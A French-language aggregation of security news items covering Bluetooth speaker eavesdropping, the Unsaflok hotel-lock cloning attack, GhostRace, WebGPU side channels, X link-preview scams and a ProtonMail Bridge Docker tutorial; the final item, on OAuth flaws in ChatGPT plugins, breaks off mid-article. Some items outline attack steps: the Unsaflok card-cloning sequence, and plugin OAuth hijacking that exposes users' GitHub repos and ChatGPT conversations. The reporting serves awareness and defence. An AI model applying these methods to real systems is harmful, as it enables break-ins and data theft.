Free vient de présenter son nouveau partenariat avec Qiara, un spécialiste des systèmes d'alarmes connectés. Les abonnés Freebox peuvent profiter dès maintenant de tarifs préférentiels sur les solutions de l'entreprise.
L’article Free lance une offre de télésurveillance à prix réduit avec Qiara est apparu en premier sur Toms Guide.
Êtes vous correctement sécurisé ?
Enfin, je parle de vous mais surtout de vos données et de votre vie privée.
Alors vous allez me dire « Oui, oui, t’inquiète, je t’ai pas attendu pour mettre un long mot de passe » mais en réalité, vous ignorez peut-être certaines mesures de sécurité qu’il seraient également bon de mettre en place.
Heureusement, l’outil Personal Security Checklist est là pour vous aider à sécuriser votre vie numérique. C’est un site que vous pourrez traduire et proposer pourquoi pas dans votre entreprise. Maintenant, pour le tester, le mieux c’est d’aller sur le site Digital Defense qui propose une version en ligne.
Vous pourrez y naviguer entre des listes thématiques et cocher les contre-mesures que vous avez adoptées. Cerise sur le gâteau, vous verrez de jolis graphiques qui vous motiveront pour progresser sur votre hygiène numérique.
Un autre point fort de cette initiative est la mise à disposition d’une API gratuite pour accéder à toutes les données de la liste de vérification. Comme ça vous pourrez intégrer cette liste dans vos outils.
La Personal Security Checklist est un projet collaboratif et il y a pas mal de documentations et de liens avec des bons petits outils comme je les aime tant.
Pour finir, la Personal Security Checklist est sous licence MIT. C’est un excellent point de départ pour renforcer la sécurité de votre vie numérique. A vous de voir si vous pouvez cocher toutes les cases !
Merci à Lorenper
Les bloqueurs de pubs ont toujours été un souci pour pas mal de sites web. Perso, je ne m’en souci pas, mais d’autres mettent en place des stratégies parfois complexes notamment avec des JavaScript qui les détectent et bloquent l’utilisateur avec une grosse popup « DÉSACTIVE TON BLOQUEUR » ou lui envoie quand même de la publicité bien intrusive.
Et de leur côté, les bloqueurs de pub s’améliorent et se mettent à jour pour bloquer à leur tour ces JavaScript et ainsi de suite… Et cette petite guéguerre ne s’arrête jamais.
Enfin, ça, c’était vrai jusqu’à aujourd’hui puisqu’une nouvelle technique de détection des adblocks vient de voir le jour : la 103 Early Hints.
C’est encore un proof of concept mais l’idée c’est qu’au lieu d’attendre que la page se charge chez l’internaute pour vérifier s’il dispose d’un bloqueur de pub, on lui envoie des 103 Early Hints, c’est-à-dire des « indices » en amont, tel des petits éclaireurs. S’ils sont bloqués par le navigateur, alors le serveur web pourra renvoyer une page différente à l’internaute ou le rediriger, sans même que celui-ci ne s’en rende compte. Cette méthode est particulièrement efficace, car elle ne dépend pas de JavaScript, qui peut être désactivé ou manipulé côté client par les utilisateurs.
Les 103 Early Hints sont un code de statut HTTP informationnel (RFC 8297) qui fonctionne comme ceci : Quand un client fait une requête HTTP à un serveur, le serveur peut envoyer une réponse intermédiaire avec le code 103 Early Hints avant d’envoyer la réponse finale (200 OK par exemple).
Cette réponse 103 contient certains en-têtes que le serveur sait déjà qu’il va inclure dans la réponse finale, comme des en-têtes Link avec des ressources à pré-charger (scripts (de pub), CSS, etc.). En recevant ces en-têtes à l’avance dans le 103, le client peut commencer à télécharger ces ressources liées pendant que le serveur finit de préparer la réponse complète. Cela permet au client d’économiser du temps en parallélisant les téléchargements et au final la page se chargera plus rapidement pour l’utilisateur. Bien sûr, les en-têtes du 103 sont indicatifs et si le client ne gère pas le 103, il l’ignore simplement et attend la réponse finale du serveur.
Vous l’aurez compris, le 103 Early Hints est un mécanisme pour donner rapidement au client des indications sur la réponse à venir, afin qu’il puisse optimiser le chargement en parallèle des ressources liées, sans avoir à attendre la réponse complète du serveur.
Et le détourner comme cela, pour savoir si l’internaute dispose d’un bloqueur de pub, c’est très malin.
Pour mettre ça en place sur votre serveur, clonez donc le repo 103-early-anti-adblock puis installez les dépendances avec npm install. Ensuitz, générez les certificats SSL avec npm run certs (obligatoire pour HTTP/2) et lancez le bazar avec npm run serve
Lancez ensuite Firefox et admirez le résultat avec ou sans bloqueur de pub ! 🤓
Alors pourquoi Firefox ? Et bien pour le moment, cette technique ne fonctionne qu’avec Firefox. En effet, Chrome ne permet pas aux adblockers d’interagir avec les ressources chargées à l’aide des 103 Early Hints, et ne les affiche pas non plus dans la console dev. Et côté Apple, Safari ne prend pas du tout en charge les 103 Early Hints.
Mais ce n’est pas vraiment un souci puisque les navigateurs qui ne prennent pas totalement en charge les 103 Early Hints peuvent être facilement détectés en ajoutant une publicité factice au préchargement, qui ne sera pas bloquée par les bloqueurs de publicité.
Bref, ça risque encore de batailler dur entre les bloqueurs de pub et les sociétés qui s’y opposent.
Des chercheurs ont découvert une faille de sécurité majeure sur les puces M d'Apple. En exploitant cette vulnérabilité, des pirates informatiques pourraient récupérer les clés de chiffrement qui protègent les MacBook, même les plus récents.
L’article MacBook : une faille impossible à corriger menace votre appareil est apparu en premier sur Toms Guide.
Microsoft annonce qu'une faille de sécurité majeure dans les services de jeu Xbox a été détectée. Une mise à jour doit corriger le problème et protéger les utilisateurs, alors assurez-vous qu'elle soit bien installée.
L’article Xbox : une faille de sécurité majeure détectée, lancez vite cette mise à jour est apparu en premier sur Toms Guide.
Une enquête alarmante révèle que les chambres de milliers d'hôtels peuvent se déverrouiller avec de fausses cartes électroniques. Les chercheurs assurent qu'un pirate peut très facilement se procurer un badge pour ouvrir toutes les portes d'un établissement.
L’article Alerte dans les hôtels : des milliers de chambres peuvent s’ouvrir avec de fausses cartes est apparu en premier sur Toms Guide.
Ça n’arrête plus ! Une faille de sécurité critique dans le protocole Bluetooth permettrait à un utilisateur tiers malveillant d’enregistrer l’audio capté par le microphone d’une enceinte Bluetooth se trouvant à proximité, même si celle-ci est déjà appairée et connectée à un autre appareil. Cette vulnérabilité peut malheureusement conduire à de l’espionnage de conversations privées que ce soit via une enceinte ou un casque. Tant que c’est bluetooth et qu’il y a un micro, ça fonctionne !
Et s’il n’y a pas de micro, cette faille permettrait également jouer ses propres fichiers audio sur vos enceintes sans votre consentement !
Ce problème de sécurité a été découvert et présenté la semaine dernière par Tarlogic lors de la conférence RootedCon 2024 avec en cadeau bonux un PoC (proof of concept) baptisé BlueSpy permettant d’exploiter la faille.
Ce script n’utilise pas de vulnérabilité non corrigée, non, non. Il exploite tout simplement la méthode d’appairage Bluetooth non sécurisée baptisée « Just Work« . C’est d’autant plus effrayant quand on considère le nombre d’enceintes ou de casques vulnérables qui traînent dans les zones résidentielles, les espaces de travail, les salles de réunion, les lieux publics, etc.
Pour sa démonstration, Tarlogic a utilisé un Raspberry Pi 4 sous Kali Linux, contrôlé par un smartphone. Notez que pour étendre la zone de couverture, il est également possible d’utiliser un adaptateur Bluetooth externe avec une antenne externe.
Mais alors, comment se protéger ? La clé de votre tranquilité et de votre sécurité réside dans la visibilité de votre appareil Bluetooth. Si votre enceinte ou casque est visible par d’autres appareils alors qu’il est déjà connecté à votre smartphone, il est vulnérable. Par contre, s’il n’est plus visible une fois appairé, vous êtes à l’abri.
Pour vérifier facilement si vos appareils audio Bluetooth sont vulnérables, vous pouvez utiliser l’application gratuite nRF Connect for Mobile sur un smartphone Android non rooté. Lancez un scan et si l’application détecte et permet de se connecter à votre appareil audio Bluetooth LE, c’est qu’il est probablement vulnérable. À l’inverse, si votre appareil n’apparaît pas dans les résultats du scan alors qu’il est allumé et connecté, vous pouvez souffler.
Malheureusement, si votre appareil autorise une telle connexion, il n’y a pas grand-chose à faire. Certains appareils émettent cependant une notification visuelle ou sonore lorsqu’un autre appareil se connecte, comme un bip, une vibration ou un changement de couleur des LED donc ouvrez l’œil et l’oreille ! Et surtout, éteignez vos appareils Bluetooth quand vous ne les utilisez pas.
Saviez vous que n’importe qui pouvait potentiellement ouvrir votre porte de chambre d’hotel en quelques secondes à peine, grâce à une simple faille de sécurité ? C’est ce qu’ont trouvé des chercheurs sur les serrures d’hôtel de la marque Saflok qui sont hyper répandues.
Ça ressemble à ça d’ailleurs, je suis certain que vous en avez déjà vu. Ce sont celles qui s’ouvrent avec une carte et malheureusement, il y en a des millions installées partout dans le monde.
Les chercheurs Ian Carroll, Lennert Wouters et leur équipe ont donc mis au point une technique baptisée « Unsaflok« , qui combine plusieurs vulnérabilités pour déverrouiller en un clin d’œil ces serrures présentes dans pas moins de 13 000 établissements à travers le monde. En analysant le chiffrement utilisé par le fabricant Dormakaba et le système RFID MIFARE Classic sur lequel reposent les cartes d’accès, ils ont ainsi trouvé le moyen de cloner n’importe quelle carte et d’ouvrir n’importe quelle porte.
Le procédé est d’une déconcertante simplicité : il suffit de récupérer une carte d’accès de l’hôtel ciblé (peu importe la chambre), d’en extraire un code spécifique grâce à un petit appareil à 300$, puis de générer deux nouvelles cartes ou de stocker les codes sur un Flipper Zero. Un premier badge réécrit une partie des données de la serrure, et le second l’ouvre dans la foulée. « Deux petits clics, et la porte s’ouvre« , résume Wouters. « Et ça marche sur absolument toutes les portes de l’hôtel.«
Les détails techniques de cette faille ont été partagés avec Dormakaba en novembre dernier. Depuis, le fabricant s’efforce d’informer ses clients et de déployer des correctifs, qui ne nécessitent heureusement pas de remplacer physiquement toutes les serrures. Une mise à jour logicielle de la réception et une reprogrammation de chaque serrure suffisent dans la plupart des cas. Mais les chercheurs estiment que seuls 36% des verrous Saflok avaient été corrigés en juin, laissant encore des centaines d’établissements vulnérables.
Pour les clients, pas de panique. Carroll et Wouters conseillent de vérifier si votre hôtel est équipé de serrures Saflok (reconnaissables à leur lecteur RFID rond barré d’une ligne ondulée), et le cas échéant, de s’assurer que votre carte est bien au nouveau format MIFARE Plus ou Ultralight EV1 grâce à l’app NFC TagInfo dispo sur Android et iOS. Si ce n’est pas le cas, mieux vaut éviter de laisser des objets de valeur dans la chambre et bien tirer le verrou et la petite chaine lorsque vous y êtes.
Cette affaire rappelle d’ailleurs celle des serrures connectées Onity, dont une faille similaire révélée en 2012 est restée longtemps non corrigée, puisque le fabricant refusait d’assumer le coût du remplacement du matos. Cette brèche de sécurité a d’ailleurs été exploitée par un hacker pour dévaliser des chambres d’hôtel à travers tous les États-Unis…
Allez, si vous me lisez depuis votre chambre d’hôtel, bonne nuit quand même !
Source : Wired.
Checkmarx publie les résultats de son rapport annuel Future of AppSec, qui donne un aperçu approfondi de l'état de la sécurité des applications, des futurs investissements et des préoccupations des entreprises mondiales. Selon, les résultats de cette étude, 92% des organisations interrogées ont subi une violation au cours de l'année 2023 liée à des vulnérabilités applicatives développées en interne.
Censuswide a conduit une enquête pour le compte de Checkmarx auprès de 1504 développeurs, RSSI et responsables AppSec dans des entreprises de 1000 à 10 000+ employés d'Amérique du Nord, d'Europe (376 entreprises dont 85 en France) et d'Asie-Pacifique. L'enquête s’est déroulée en décembre 2023.
Depuis quelques années, la responsabilité exclusive de la sécurité des applications s'est éloignée des équipes de sécurité qui se partagent désormais la tâche avec les responsables AppSec et les développeurs. Les développeurs sont par ailleurs intégrés dans les processus d’achat de solutions AppSec clés pour près de la moitié des entreprises interrogées (49%) tandis que pour 41% ce sont toujours les responsables AppSec et 40% les RSSI qui gardent cette responsabilité.
Des logiciels vulnérables mis en production
91% des entreprises ont consciemment publié des applications vulnérables, déplorant un développement logiciel toujours plus rapide au sein d'environnements hétérogènes et moins de temps consacré à la sécurité.
A la question relative au choix de publier des applications présentant des vulnérabilités, la première raison avancée est la pression exercée par l'entreprise : 29% des responsables Appsec ont déclaré avoir publié les applications « pour respecter un délai imposé par l'entreprise, les fonctionnalités ou la sécurité », 18% des RSSI « espéraient » que la vulnérabilité ne serait pas exploitable et 29% des développeurs que la vulnérabilité serait corrigée au cours d’une version ultérieure. En France, 35% des entreprises ayant déployé du code vulnérable pensaient le corriger ultérieurement, 39% considéraient la vulnérabilité comme non critique et 35% comme trop difficile à réparer.
« Dans un contexte où les applications cloud natives sont déployées plusieurs fois par jour, l'atténuation des risques de sécurité applicative devient une responsabilité partagée », déclare Amit Daniel, Directrice marketing, Checkmarx. « Les entreprises recherchent aujourd’hui de la visibilité sur la posture de sécurité de l'ensemble de leur empreinte organisationnelle. Notre objectif est de leur fournir cette visibilité pour mettre en œuvre le « DevSecTrust », c'est-à-dire réinjecter de la confiance entre les développeurs et les équipes sécurité, pour les aider à atteindre un tout autre niveau de maturité Appsec. »
Un contexte applicatif complexe
Les trois principales préoccupations des développeurs sont la tension entre les exigences de délai de livraison (time to market) et les volumes potentiels de vulnérabilités nécessitant une correction, notamment l'entrave du processus de développement par les exigences en matière de sécurité, la difficulté à savoir quelles vulnérabilités corriger et comment les hiérarchiser, et enfin le manque de contexte pour les aider à corriger. Pas moins de 61% des développeurs ont déclaré qu'il était essentiel que la sécurité ne bloque pas ou ne ralentisse pas le processus de développement ou ne devienne pas un obstacle à la réussite de l'entreprise. Pour combler les lacunes en matière de sécurité applicative, l'intégration transparente d'outils AppSec dans les flux de travail des développeurs devient essentielle.
La composition des applications est devenue plus complexe, intégrant le code source, les packages open source, l'infrastructure as code (IaC), les conteneurs, etc. Cette augmentation exponentielle de la complexité renforce la nécessité pour les entreprises d'analyser l'ensemble du cycle de vie du développement logiciel, du code au cloud.
Une plateforme AppSec complète va permettre de répondre à ces préoccupations pour :
Les failles de sécurité dans le code sont le cauchemar des développeurs et des équipes de sécurité et font surtout le régal des hackers. Alors pour y remédier, GitHub a décidé de sortir l’artillerie lourde avec Code Scanning Autofix ! Attention les yeux, cet outil mêle IA et analyse statique et nous fait la promesse de corriger les vulnérabilités en un clin d’œil pendant que vous codez.
Concrètement, Code Scanning Autofix (actuellement en bêta publique) est activé par défaut sur tous les dépôts privés des clients GitHub Advanced Security. Et devinez quoi ? Il gère déjà plus de 90% des types d’alertes pour JavaScript, TypeScript, Java et Python. De quoi mettre une sacrée claque à la dette de sécurité applicative !
En coulisse, cette magie opère grâce à deux technologies de pointe made in GitHub : Copilot pour l’IA et CodeQL pour l’analyse statique. Une fois Code Scanning Autofix activé, il vous propose des correctifs quasi tout cuits qui sont censés régler les deux tiers des vulnérabilités détectées, le tout sans trop d’efforts de votre part.
Voici un exemple de correctif proposé :
Pour chaque faille repérée dans un des langages pris en charge, vous obtenez une explication en langage naturel du correctif suggéré, avec un aperçu du bout de code à valider, modifier ou rejeter. Cela peut inclure des changements dans le fichier en cours, d’autres fichiers, voire des dépendances du projet. Bien entendu, vous gardez le contrôle et pouvez vérifier si le correctif résout bien le problème sans casser la fonctionnalité.
L’intérêt est donc de décharger les experts en sécurité de la fastidieuse traque aux vulnérabilités introduites pendant le développement. Ils pourront alors se concentrer sur la sécurité globale de leur projet.
GitHub promet d’étendre prochainement Code Scanning Autofix à d’autres langages, en commençant par C# et Go. Et pour en savoir plus, foncez sur la doc de GitHub !
Avez-vous déjà cliqué sur un lien posté sur X (Ah, pour une fois que je dis pas « Twitter » ! Je m’améliore !) en pensant atterrir sur un article de Forbes, mais vous vous êtes retrouvés sur un compte Telegram chelou qui parle de crypto ? Ouais, c’est couillon hein… Mais en fait, c’est pas un bug, c’est une sacré faille bien vicieuse !
En gros, quand X génère un aperçu pour un lien externe dans un tweet, il essaie de deviner la destination finale de l’URL. Sauf que des petits malins ont trouvé un moyen de le duper en redirigeant les vrais internautes vers un site différent de celui montré aux robots de X. 🤖
Le truc, c’est que les escrocs utilisent un site intermédiaire qui vérifie si la requête vient d’un navigateur web (donc d’un humain) ou d’un bot. Si c’est un bot, hop, il renvoie vers un article légitime de Forbes. Mais si c’est vous ou moi… Tada ! On se tape une redirection surprise vers un compte Telegram louche !
Le pire, c’est que sur l’app X, impossible de vérifier où mène vraiment un lien avant de cliquer. Alors que sur un navigateur desktop, un ptit survol et hop, l’URL s’affiche. Mais sur mobile, pas moyen ! Tu cliques sur « forbes.com » et tu t’retrouves sur « arnaque-cryptos.ru » en moins de deux.
Bref, méfiance maximale avec les liens postés sur X, surtout depuis un smartphone. C’est la jungle et les arnaqueurs en tout genre sont à l’affût pour vous piéger avec des liens fourbes ! Vérifiez bien l’URL avant de cliquer et évitez carrément les liens sur l’app si vous avez un doute. Ou alors, vous suivez que mon compte Twitter et là, pas de souci ^^.
A bon entendeur…
Vous pensiez que votre GPU était à l’abri des regards indiscrets ? Que nenni damoiseaux zé demoiselles !!!
Une équipe de chercheurs vient de mettre en lumière des failles béantes dans la sécurité de l’API WebGPU, cette technologie qui booste les performances graphiques de nos navigateurs.
D’après cette étude, ces vulnérabilités permettraient à des scripts malveillants d’exploiter les canaux auxiliaires du GPU pour siphonner des données sensibles, comme vos mots de passe ou vos clés de chiffrement. Rien que ça ! 😱 Concrètement, les chercheurs ont réussi à monter ces attaques par canaux auxiliaires en fonction du temps et de l’état du cache du GPU, le tout depuis un simple navigateur web.
En analysant finement l’impact de différentes charges de travail sur les performances du processeur graphique, ils sont parvenus à en déduire des informations sur les autres processus utilisant cette ressource qui est, vous vous en doutez, partagée. Et c’est là qu’est le problème.
Le plus inquiétant, c’est que leur proof of concept se résume à du code JavaScript tout ce qu’il y a de plus basique. Pas besoin d’avoir accès au PC, un site web malveillant peut très bien faire l’affaire. De quoi donner des sueurs froides aux éditeurs de navigateurs… Rassurez-vous, je ne compte pas l’intégrer sur Korben.info, la bouffe n’est pas assez bonne en prison ^^.
Pour l’instant, à part Mozilla qui a publié un bulletin d’avertissement, les principaux acteurs comme Google ou Microsoft n’ont pas réagi. Bouuuuh ! Ils estiment sans doute que le jeu n’en vaut pas la chandelle et préfèrent miser sur les gains de performances de WebGPU plutôt que de s’embarrasser avec des demandes d’autorisations qui gâcheraient l’expérience utilisateur.
Pourtant, les chercheurs sont formels, les sociétés qui conçoivent des navigateurs doivent traiter l’accès au GPU avec la même rigueur que les autres ressources sensibles comme la caméra ou le micro. Sinon, gare aux dérives ! On peut imaginer des utilisateurs qui se font piller leurs cryptomonnaies pendant qu’ils surfent innocemment, ou pire, des fuites de données à grande échelle orchestrées depuis des sites en apparence légitimes.
Avec ça, le bandeau RGPD peut aller se rhabiller ^^/
Rassurez-vous, pour le moment, WebGPU est activé par défaut uniquement dans Chrome et ses dérivés. Pour Firefox, c’est encore seulement dans les versions Nightly (mais ça arrive bientôt). Je vous laisse tester votre navigateur avec le proof of concept dont je vous parlais un peu plus haut.
Bref, cette étude a le mérite de lancer le débat sur les implications sécuritaires des API web de plus en plus intrusives. À l’heure où le GPU s’impose comme une ressource de calcul incontournable, y compris pour des tâches sensibles, la question de son isolation et de la maîtrise des accès devient cruciale.
Bref, on réfléchira à deux fois avant d’autoriser l’accès au GPU sur un site louche… 😉
Vous voulez envoyer des emails chiffrés de bout en bout avec votre client mail favori, mais sans vous prendre la tête ? J’ai ce qu’il vous faut les amis : le projet open source ProtonMail Bridge pour Docker de mon gars sûr DaTux, un fidèle lecteur de Korben.info que je croise souvent sur mon live Twitch.
Ce mec a passé plus de temps à rédiger le README.md de son projet qu’à le coder, mais le résultat est là : une version dockerisée de l’interface en ligne de commande de ProtonMail Bridge qui crée un serveur SMTP local. Comme ça, vos autres conteneurs Docker peuvent envoyer des mails via votre compte ProtonMail. La classe, non ?
Bon par contre, petit bémol : pour l’instant, il faut un compte payant (Mail Plus, Proton Unlimited ou Proton Business) pour se connecter. Ça marchera pas avec les comptes gratuits. Mais vu le niveau de confidentialité et de sécurité que ça apporte à vos échanges d’emails pro, ça les vaut !
Pour commencer, récupérez la dernière image Docker avec :
docker pull ghcr.io/videocurio/proton-mail-bridge:latest
Ou la version allégée basée sur Alpine Linux :
docker pull ghcr.io/videocurio/proton-mail-bridge-alpine:latest
Ensuite, lancez le conteneur en exposant les ports TCP 12025 pour SMTP et 12143 pour IMAP sur votre interface réseau locale.
docker run -d --name=protonmail_bridge -v /path/to/your/volume/storage:/root -p 127.0.0.1:12025:25/tcp -p 127.0.0.1:12143:143/tcp --network network20 --restart=unless-stopped ghcr.io/videocurio/proton-mail-bridge:latest
N’oubliez pas de fournir un volume pour la persistance des données (mkdir /path/to/your/volume/storage).
Maintenant, ouvrez un terminal dans le conteneur en cours d’exécution et utilisez l’interface de commande interactive de ProtonMail Bridge :
docker exec -it protonmail_bridge /bin/bash
À l’intérieur, killez d’abord l’instance de bridge par défaut car une seule peut tourner à la fois :
pkill bridge
Puis connectez-vous à votre compte ProtonMail (rappel : faut un compte payant) :
/app/bridge --cli
Suivez les instructions à l’écran, renseignez votre nom d’utilisateur, mot de passe et code 2FA. Une synchro de votre compte va commencer. Prenez un café en attendant ! Si vous utilisez plusieurs domaines ou adresses email, passez en mode « split » qui va vous permettre de définir des identifiants pour chaque adresse du compte.
Ensuite re-faite ceci pour resynchroniser encore un petit coup :
change mode 0
Quand c’est fini, tapez info pour récupérer les infos de connexion SMTP/IMAP générées par ProtonMail Bridge. Copiez bien l’username ET le mot de passe (différent de celui de votre compte ProtonMail !!). Vous pouvez maintenant configurer votre client mail favori avec ces identifiants, en précisant les ports SMTP 12025 et IMAP 12143 qu’on a exposés au lancement du conteneur Docker.
Et voilà, vous pouvez envoyer des emails chiffrés de bout en bout dans la plus grande des discrétion ! Évidemment, le destinataire devra aussi avoir un compte ProtonMail pour les déchiffrer de son côté.
Pour aller plus loin, j’vous conseille de jeter un œil au README hyper complet de DaTux, avec tous les détails d’install et d’utilisation. Il a même prévu une version optimisée pour tourner sur un serveur TrueNAS Scale, le bienheureux.
En soutien, n’hésitez pas à lui mettre une petite étoile sur son repo GitHub et à partager ce tuto autour de vous !
A la prochaine !
Si vous recevez un SMS vous demandant de mettre à jour votre compte Ameli rapidement, il s'agit d'une arnaque. Des malfaiteurs se font passer pour l'Assurance Maladie afin de voler de l'argent aux particuliers.
L’article Assurance Maladie : cette arnaque par SMS et téléphone peut coûter des milliers d’euros est apparu en premier sur Toms Guide.
Vous pensiez que votre infra était bien protégée ? Détrompez-vous les amis, les cyberattaques sont de plus en plus vicieuses et sophistiquées !
J’sais pas si vous utilisez Cloudflare pour sécuriser et optimiser votre site, mais si c’est le cas, vous allez être heureux puisqu’ils ont sorti un nouvel outil pour nous aider à garder nos sites en sécurité: Cloudflare Security Center.
Cette nouvelle fonctionnalité nous permet d’avoir une vision globale de notre surface d’attaque, c’est-à-dire tous les points d’entrée potentiels pour les hackers. On parle des serveurs, des applis, des APIs, bref, tout ce qui est exposé sur le web. Le Security Center scanne tout ça et nous alerte sur les failles de sécurité et les mauvaises configurations qui pourraient nous mettre dans la mouise.
Vous aurez donc besoin :
Passons maintenant à l’activation de la fonctionnalité et le lancement du scan initial
Vous verrez alors les problèmes détectés sur votre compte Cloudfalre ainsi que leur sévérité. De mon côté, rien de bien méchant.
Mais attention, c’est pas juste un simple scanner ! L’outil a aussi des fonctionnalités de gestion des risques. Il vous aide à prioriser les problèmes et vous guide pour les résoudre rapidement. Plus besoin de se prendre la tête pendant des heures, on clique sur quelques boutons et hop, c’est réglé !
Ensuite, vous n’aurez rien à gérer puisque Security Center fera des scans régulièrement en fonction de votre forfait. Plus vous avez un plan costaud, plus vos scans seront fréquents.
Ce centre de sécurité propose également un scan de votre infra pour voir tous vos sous-domaines et savoir s’ils sont correctement sécurisés. Et si y’a une adresse IP, un nom de domaine, une URL ou un AS sur laquelle vous avez un doute, vous pouvez même mener une petite enquête dessus
En plus, le Security Center surveille aussi les tentatives d’usurpation d’identité et de phishing. C’est encore en beta, donc j’ai pas pu tester, mais imaginez un peu que des petits malins qui essaient de se faire passer pour votre boîte pour piquer les données de vos clients… Et bien avec Cloudflare qui veille au grain, vous devriez vite les débusquer.
Bref, que vous ayez un petit site vitrine ou une grosse plateforme e-commerce, si vous utilisez Cloudflare, je vous invite à y faire un tour.
Apple est poursuivi devant la justice californienne par trois personnes, à cause de son tracker AirTag. Détourné de son usage originel, le traceur qui permet de ne jamais perdre ses affaires est un redoutable outil pour les harceleurs qui veulent suivre leurs victimes.
L’article Apple poursuivi en justice pour son AirTag : le tracker est un redoutable outil de harcèlement est apparu en premier sur Toms Guide.
Accrochez-vous bien à vos chaises (ou à vos hamacs, je ne juge pas 😉) car des chercheurs en sécurité nous ont encore pondu une nouvelle attaque qui devrait bien faire stresser sur la sécurité de vos CPU !
Oui je sais, on en a déjà vu des vertes et des pas mûres avec Spectre, Meltdown et toute la clique… Mais là, c’est tout aussi lourd. Ça s’appelle GhostRace et ça va vous hanter jusque dans vos cauchemars !
En gros, c’est une variante de Spectre qui arrive à contourner toutes les protections logicielles contre les race conditions. Les mecs de chez IBM et de l’université d’Amsterdam ont donc trouvé un moyen d’exploiter l’exécution spéculative des processeurs (le truc qui leur permet de deviner et d’exécuter les instructions à l’avance) pour court-circuiter les fameux mutex et autres spinlocks qui sont censés empêcher que plusieurs processus accèdent en même temps à une ressource partagée.
Résultat des courses: les attaquants peuvent provoquer des race conditions de manière spéculative et en profiter pour fouiner dans la mémoire et chopper des données sensibles ! C’est vicieux… En plus de ça, l’attaque fonctionne sur tous les processeurs connus (Intel, AMD, ARM, IBM) et sur n’importe quel OS ou hyperviseur qui utilise ce genre de primitives de synchronisation. Donc en gros, personne n’est à l’abri !
Les chercheurs ont même créé un scanner qui leur a permis de trouver plus de 1200 failles potentielles rien que dans le noyau Linux. Et leur PoC arrive à siphonner la mémoire utilisée par le kernel à la vitesse de 12 Ko/s. Bon après, faut quand même un accès local pour exploiter tout ça, mais quand même, ça la fout mal…
Bref, c’est la grosse panique chez les fabricants de CPU et les éditeurs de systèmes qui sont tous en train de se renvoyer la balle façon ping-pong. 🏓 Les premiers disent « mettez à jour vos OS« , les seconds répondent « patchez d’abord vos CPU !« . En attendant, c’est nous qui trinquons hein…
Mais y’a quand même une lueur d’espoir: les chercheurs ont aussi proposé une solution pour « mitiger » le problème. Ça consiste à ajouter des instructions de sérialisation dans toutes les primitives de synchronisation vulnérables. Bon ok, ça a un coût en perfs (5% sur LMBench quand même) mais au moins ça colmate les brèches. Reste plus qu’à convaincre Linus Torvalds et sa bande de l’implémenter maintenant… 😒
En attendant, je vous conseille de garder l’œil sur les mises à jour de sécurité de votre OS et de votre microcode, on sait jamais ! Et si vous voulez en savoir plus sur les dessous techniques de l’attaque, jetez un œil au white paper et au blog des chercheurs, c’est passionnant.
A la prochaine pour de nouvelles (més)aventures !
Votre smartphone est votre coffre-fort numérique, mais la clé est menacée. Les pirates s'attaquent désormais aux eSIM, ces cartes SIM virtuelles, pour détourner vos numéros et piller vos comptes. Découvrez comment vous protéger de cette nouvelle menace grandissante.
L’article Attention aux eSIM : des pirates détournent vos numéros pour pirater vos comptes est apparu en premier sur Toms Guide.
Vous souhaitez vous former à la Cybersécurité et aprendre les bases de la cybersécurité offensive et défensive ?
La Hackthebox Academy propose des formations gratuites dans son catalogue de formation en ligne en plus de son Lab qui permet de s'initier aux tests d'intrusion (pentests).
Les formations du tiers 0 se composent d'une liste de 20 modules de formation très complets pour débuter dans la cybersécurité :
Les modules de formation simples accessibles pour des débutants :
Les Modules de formation de complexité moyenne :
Chacun des modules de formations listés ci-dessus coûte l'équivalent de 10 cubes, il s'agit de la monnaie virtuelle utilisée sur la plateforme Hackthebox.
Ces 10 cubes vous sont restitués une fois le module terminé. Cela signifie qu'avec les 60 cubes offerts lors de la création de votre compte, vous pouvez réaliser l'ensemble des modules du tiers 0 gratuitement.
Ces modules de formation gratuits représentent l'équivalent de 14 jours de formation à raison de 7h d'apprentissage par jour. Cela vous laisse du temps avant de démarrer les formations payantes des tiers 1, 2 et 3 qui possèdent une complexité plus importante.
Hackthebox joue sur la gamification de ses parcours pour vous garder le plus longtemps possible sur la plateforme.
Une fois les formations gratuites réalisées, les modules payants peuvent être accédées :
Une fois formé, la plateforme Hackthebox propose différentes certifications payantes qui permettront de valoriser les compétences acquises :
Découvrez la plateforme Hackthebox Academy et profitez d'un crédit gratuit de 60 Cubes grâce à ce lien. Bonne formation !
Vous avez entendu parler de ces vulnérabilités dans ChatGPT et ses plugins ?
Ça n’a rien à voir avec l’article précédent, car cette fois c’est Salt Labs qui a découvert le pot aux roses et publié ça dans un article de blog où ils explique comment des affreux pouvaient accéder aux conversations privées des utilisateurs et même à leurs comptes GitHub perso, juste en exploitant des failles dans l’implémentation d’OAuth.
Bon déjà, c’est quoi OAuth ?
C’est un protocole qui permet à une appli d’accéder à vos données sur un autre site sans que vous n’ayez à filer vos identifiants. Hyper pratique mais faut pas se louper dans le code sinon ça part en sucette… Et devinez quoi ? Bah c’est exactement ce qui s’est passé avec certains plugins de ChatGPT !
Salt Labs a trouvé notamment une faille bien vicieuse dans PluginLab, un framework que plein de devs utilisent pour concevoir des plugins. En gros, un attaquant pouvait s’infiltrer dans le compte GitHub d’un utilisateur à son insu grâce au plugin AskTheCode. Comment ? Tout simplement en bidouillant la requête OAuth envoyée par le plugin pour injecter l’ID d’un autre utilisateur au lieu du sien. Vu que PluginLab ne vérifiait pas l’origine des demandes, c’était open bar !
Le pire c’est que cet ID utilisateur, c’était juste le hash SHA-1 de son email. Donc si le hacker connaissait l’email de sa victime, c’était gagné d’avance. Et comme si ça suffisait pas, y’avait carrément un endpoint de l’API PluginLab qui balançait les ID quand on lui envoyait une requête avec une adresse email. Un boulevard pour les cybercriminels !
Une fois qu’il avait chopé le précieux sésame OAuth en se faisant passer pour sa victime, l’attaquant pouvait alors se servir de ChatGPT pour fouiner dans les repos privés GitHub de sa cible. Au menu : liste des projets secrets et accès en lecture aux fichiers confidentiels, le jackpot pour voler du code proprio, des clés d’API ou d’autres données sensibles.
Mais attendez, c’est pas fini ! Salt Labs a déniché deux autres failles bien creepy. La première dans ChatGPT lui-même : un attaquant pouvait créer son propre plugin pourri et le faire valider par ChatGPT sans que l’utilisateur ait son mot à dire. Ensuite en envoyant un lien piégé il installait direct son plugin à la victime qui cliquait dessus. Ni vu ni connu le plugin malveillant aspirait alors les conversations privées sur ChatGPT.
